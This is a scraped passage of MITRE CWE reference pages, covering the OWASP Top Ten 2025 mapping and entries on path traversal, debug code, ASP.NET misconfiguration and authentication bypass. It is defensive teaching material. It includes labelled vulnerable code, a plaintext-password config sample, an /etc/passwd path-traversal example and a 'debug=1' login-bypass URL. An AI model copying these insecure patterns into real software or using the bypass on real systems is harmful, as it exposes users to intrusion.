The product does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1443
(OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures) >
353
(Missing Support for Integrity Check)
The product uses a transmission protocol that does not include a mechanism for verifying the integrity of the data during transmission, such as a checksum.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1443
(OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures) >
426
(Untrusted Search Path)
The product searches for critical resources using an externally-supplied search path that can point to resources that are not under the product's direct control.
Untrusted Path
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1443
(OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures) >
427
(Uncontrolled Search Path Element)
The product uses a fixed or controlled search path to find resources, but one or more locations in that path can be under the control of unintended actors.
DLL preloading
Binary planting
Insecure library loading
Dependency confusion
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1443
(OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures) >
494
(Download of Code Without Integrity Check)
The product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1443
(OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures) >
502
(Deserialization of Untrusted Data)
The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.
Marshaling, Unmarshaling
Pickling, Unpickling
PHP Object Injection
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1443
(OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures) >
506
(Embedded Malicious Code)
The product contains code that appears to be malicious in nature.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1443
(OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures) >
509
(Replicating Malicious Code (Virus or Worm))
Replicating malicious code, including viruses and worms, will attempt to attack other systems once it has successfully compromised the target system or the product.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1443
(OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures) >
565
(Reliance on Cookies without Validation and Integrity Checking)
The product relies on the existence or values of cookies when performing security-critical operations, but it does not properly ensure that the setting is valid for the associated user.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1443
(OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures) >
784
(Reliance on Cookies without Validation and Integrity Checking in a Security Decision)
The product uses a protection mechanism that relies on the existence or values of a cookie, but it does not properly ensure that the cookie is valid for the associated user.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1443
(OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures) >
829
(Inclusion of Functionality from Untrusted Control Sphere)
The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1443
(OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures) >
830
(Inclusion of Web Functionality from an Untrusted Source)
The product includes web functionality (such as a web widget) from another domain, which causes it to operate within the domain of the product, potentially granting total access and control of the product to the untrusted source.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1443
(OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures) >
915
(Improperly Controlled Modification of Dynamically-Determined Object Attributes)
The product receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified.
Mass Assignment
AutoBinding
PHP Object Injection
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1443
(OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures) >
926
(Improper Export of Android Application Components)
The Android application exports a component for use by other applications, but does not properly restrict which applications can launch the component or access the data it contains.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1444
(OWASP Top Ten 2025 Category A09:2025 - Logging & Alerting Failures)
Weaknesses in this category are related to the A09 category "Logging & Alerting Failures" in the OWASP Top Ten 2025.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1444
(OWASP Top Ten 2025 Category A09:2025 - Logging & Alerting Failures) >
117
(Improper Output Neutralization for Logs)
The product constructs a log message from external input, but it does not neutralize or incorrectly neutralizes special elements when the message is written to a log file.
Log forging
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1444
(OWASP Top Ten 2025 Category A09:2025 - Logging & Alerting Failures) >
221
(Information Loss or Omission)
The product does not record, or improperly records, security-relevant information that leads to an incorrect decision or hampers later analysis.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1444
(OWASP Top Ten 2025 Category A09:2025 - Logging & Alerting Failures) >
223
(Omission of Security-relevant Information)
The product does not record or display information that would be important for identifying the source or nature of an attack, or determining if an action is safe.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1444
(OWASP Top Ten 2025 Category A09:2025 - Logging & Alerting Failures) >
532
(Insertion of Sensitive Information into Log File)
The product writes sensitive information to a log file.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1444
(OWASP Top Ten 2025 Category A09:2025 - Logging & Alerting Failures) >
778
(Insufficient Logging)
When a security-critical event occurs, the product either does not record the event or omits important details about the event when logging it.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions)
Weaknesses in this category are related to the A10 category "Mishandling of Exceptional Conditions" in the OWASP Top Ten 2025.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
209
(Generation of Error Message Containing Sensitive Information)
The product generates an error message that includes sensitive information about its environment, users, or associated data.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
215
(Insertion of Sensitive Information Into Debugging Code)
The product inserts sensitive information into debugging code, which could expose this information if the debugging code is not disabled in production.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
234
(Failure to Handle Missing Parameter)
If too few arguments are sent to a function, the function will still pop the expected number of arguments from the stack. Potentially, a variable number of arguments could be exhausted in a function as well.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
235
(Improper Handling of Extra Parameters)
The product does not handle or incorrectly handles when the number of parameters, fields, or arguments with the same name exceeds the expected amount.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
248
(Uncaught Exception)
An exception is thrown from a function, but it is not caught.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
252
(Unchecked Return Value)
The product does not check the return value from a method or function, which can prevent it from detecting unexpected states and conditions.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
274
(Improper Handling of Insufficient Privileges)
The product does not handle or incorrectly handles when it has insufficient privileges to perform an operation, leading to resultant weaknesses.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
280
(Improper Handling of Insufficient Permissions or Privileges )
The product does not handle or incorrectly handles when it has insufficient privileges to access resources or functionality as specified by their permissions. This may cause it to follow unexpected code paths that may leave the product in an invalid state.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
369
(Divide By Zero)
The product divides a value by zero.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
390
(Detection of Error Condition Without Action)
The product detects a specific error, but takes no actions to handle the error.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
391
(Unchecked Error Condition)
[PLANNED FOR DEPRECATION. SEE MAINTENANCE NOTES AND CONSIDER CWE-252, CWE-248, OR CWE-1069.] Ignoring exceptions and other error conditions may allow an attacker to induce unexpected behavior unnoticed.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
394
(Unexpected Status Code or Return Value)
The product does not properly check when a function or operation returns a value that is legitimate for the function, but is not expected by the product.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
396
(Declaration of Catch for Generic Exception)
Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
397
(Declaration of Throws for Generic Exception)
The product throws or raises an overly broad exceptions that can hide important details and produce inappropriate responses to certain conditions.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
460
(Improper Cleanup on Thrown Exception)
The product does not clean up its state or incorrectly cleans up its state when an exception is thrown, leading to unexpected state or control flow.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
476
(NULL Pointer Dereference)
The product dereferences a pointer that it expects to be valid but is NULL.
NPD
null deref
NPE
nil pointer dereference
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
478
(Missing Default Case in Multiple Condition Expression)
The code does not have a default case in an expression with multiple conditions, such as a switch statement.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
484
(Omitted Break Statement in Switch)
The product omits a break statement within a switch or similar construct, causing code associated with multiple conditions to execute. This can cause problems when the programmer only intended to execute code associated with one condition.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
550
(Server-generated Error Message Containing Sensitive Information)
Certain conditions, such as network failure, will cause a server error message to be displayed.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
636
(Not Failing Securely ('Failing Open'))
When the product encounters an error condition or failure, its design requires it to fall back to a state that is less secure than other options that are available, such as selecting the weakest encryption algorithm or using the most permissive access control restrictions.
Failing Open
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
703
(Improper Check or Handling of Exceptional Conditions)
The product does not properly anticipate or handle exceptional conditions that rarely occur during normal operation of the product.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
754
(Improper Check for Unusual or Exceptional Conditions)
The product does not check or incorrectly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the product.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
755
(Improper Handling of Exceptional Conditions)
The product does not handle or incorrectly handles an exceptional condition.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1445
(OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions) >
756
(Missing Custom Error Page)
The product does not return custom error pages to the user, possibly exposing sensitive information.
Maintenance
As of CWE 4.19, the relationships in this view were pulled directly from the CWE mappings cited in the 2025 OWASP Top Ten RC1. These mappings include categories and high-level weaknesses. One mapping to a deprecated entry was removed. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself.
View ComponentsA | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z
CWE-36: Absolute Path Traversal
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as "/abs/path" that can resolve to a location that is outside of that directory.
This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the example below, the path to a dictionary file is read from a system property and used to initialize a File object. (bad code)
Example Language: Java
String filename = System.getProperty("com.domain.application.dictionaryFile");
File dictionaryFile = new File(filename); However, the path is not validated or modified to prevent it from containing relative or absolute path sequences before creating the File object. This allows anyone who can control the system property to determine what file is used. Ideally, the path should be resolved relative to some kind of application or user home directory. Example 2 This script intends to read a user-supplied file from the current directory. The user inputs the relative path to the file and the script uses Python's os.path.join() function to combine the path to the current working directory with the provided path to the specified file. This results in an absolute path to the desired file. If the file does not exist when the script attempts to read it, an error is printed to the user. (bad code)
Example Language: Python
import os
import sys def main():
filename = sys.argv[1]
main()
path = os.path.join(os.getcwd(), filename) try:
with open(path, 'r') as f:
except FileNotFoundError as e:
file_data = f.read()
print("Error - file not found")
However, if the user supplies an absolute path, the os.path.join() function will discard the path to the current working directory and use only the absolute path provided. For example, if the current working directory is /home/user/documents, but the user inputs /etc/passwd, os.path.join() will use only /etc/passwd, as it is considered an absolute path. In the above scenario, this would cause the script to access and read the /etc/passwd file. (good code)
Example Language: Python
import os
import sys def main():
filename = sys.argv[1]
main()
path = os.path.normpath(f"{os.getcwd()}{os.sep}{filename}") if path.startswith("/home/cwe/documents/"):
try:
with open(path, 'r') as f:
except FileNotFoundError as e:
file_data = f.read()
print("Error - file not found")
The constructed path string uses os.sep to add the appropriate separation character for the given operating system (e.g. '\' or '/') and the call to os.path.normpath() removes any additional slashes that may have been entered - this may occur particularly when using a Windows path. The path is checked against an expected directory (/home/cwe/documents); otherwise, an attacker could provide relative path sequences like ".." to cause normpath() to generate paths that are outside the intended directory (CWE-23). By putting the pieces of the path string together in this fashion, the script avoids a call to os.path.join() and any potential issues that might arise if an absolute path is entered. With this version of the script, if the current working directory is /home/cwe/documents, and the user inputs /etc/passwd, the resulting path will be /home/cwe/documents/etc/passwd. The user is therefore contained within the current working directory as intended. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-489: Active Debug Code
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Debug code can be used to bypass authentication. For example, suppose an application has a login script that receives a username and a password. Assume also that a third, optional, parameter, called "debug", is interpreted by the script as requesting a switch to debug mode, and that when this parameter is given the username and password are not checked. In such a case, it is very simple to bypass the authentication process if the special behavior of the application regarding the debug parameter is known. In a case where the form is: (bad code)
Example Language: HTML
<FORM ACTION="/authenticate_login.cgi">
<INPUT TYPE=TEXT name=username> </FORM><INPUT TYPE=PASSWORD name=password> <INPUT TYPE=SUBMIT> Then a conforming link will look like: (informative)
http://TARGET/authenticate_login.cgi?username=...&password=...
An attacker can change this to: (attack code)
http://TARGET/authenticate_login.cgi?username=&password=&debug=1
Which will grant the attacker access to the site, bypassing the authentication process.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other
In J2EE a main method may be a good indicator that debug code has been left in the application, although there may not be any direct security impact.
CWE-11: ASP.NET Misconfiguration: Creating Debug Binary
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
ASP .NET applications can be configured to produce debug binaries. These binaries give detailed debugging messages and should not be used in production environments. Debug binaries are meant to be used in a development or testing environment and can pose a security risk if they are deployed to production.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The file web.config contains the debug mode setting. Setting debug to "true" will let the browser display debugging information. (bad code)
Example Language: XML
<?xml version="1.0" encoding="utf-8" ?>
<configuration> <system.web> </configuration><compilation </system.web>defaultLanguage="c#" debug="true" /> ... Change the debug mode to false when the application is deployed into production.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-1174: ASP.NET Misconfiguration: Improper Model Validation
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe ASP.NET application does not use, or incorrectly uses, the model validation framework.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-13: ASP.NET Misconfiguration: Password in Configuration File
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterStoring a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource making them an easy target for attackers.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database, but the pair is stored in plaintext. (bad code)
Example Language: ASP.NET
...
<connectionStrings> <add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /> </connectionStrings>... Username and password information should not be included in a configuration file or a properties file in plaintext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-289: Authentication Bypass by Alternate Name
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product performs authentication based on the name of a resource being accessed, or the name of the actor performing the access, but it does not properly check all possible names for that resource or actor.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
Overlaps equivalent encodings, canonicalization, authorization, multiple trailing slash, trailing space, mixed case, and other equivalence issues.
Theoretical
Alternate names are useful in data driven manipulation attacks, not just for authentication.
CWE-302: Authentication Bypass by Assumed-Immutable Data
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe authentication scheme or implementation uses key data elements that are assumed to be immutable, but can be controlled or modified by the attacker.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following example, an "authenticated" cookie is used to determine whether or not a user should be granted access to a system. (bad code)
Example Language: Java
boolean authenticated = new Boolean(getCookieValue("authenticated")).booleanValue();
if (authenticated) { ... }Modifying the value of a cookie on the client-side is trivial, but many developers assume that cookies are essentially immutable. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-294: Authentication Bypass by Capture-replay
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterA capture-replay flaw exists when the design of the product makes it possible for a malicious user to sniff network traffic and bypass authentication by replaying it to the server in question to the same effect as the original message (or with minor changes).
Capture-replay attacks are common and can be difficult to defeat without cryptography. They are a subset of network injection attacks that rely on observing previously-sent valid commands, then changing them slightly if necessary and resending the same commands to the server.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
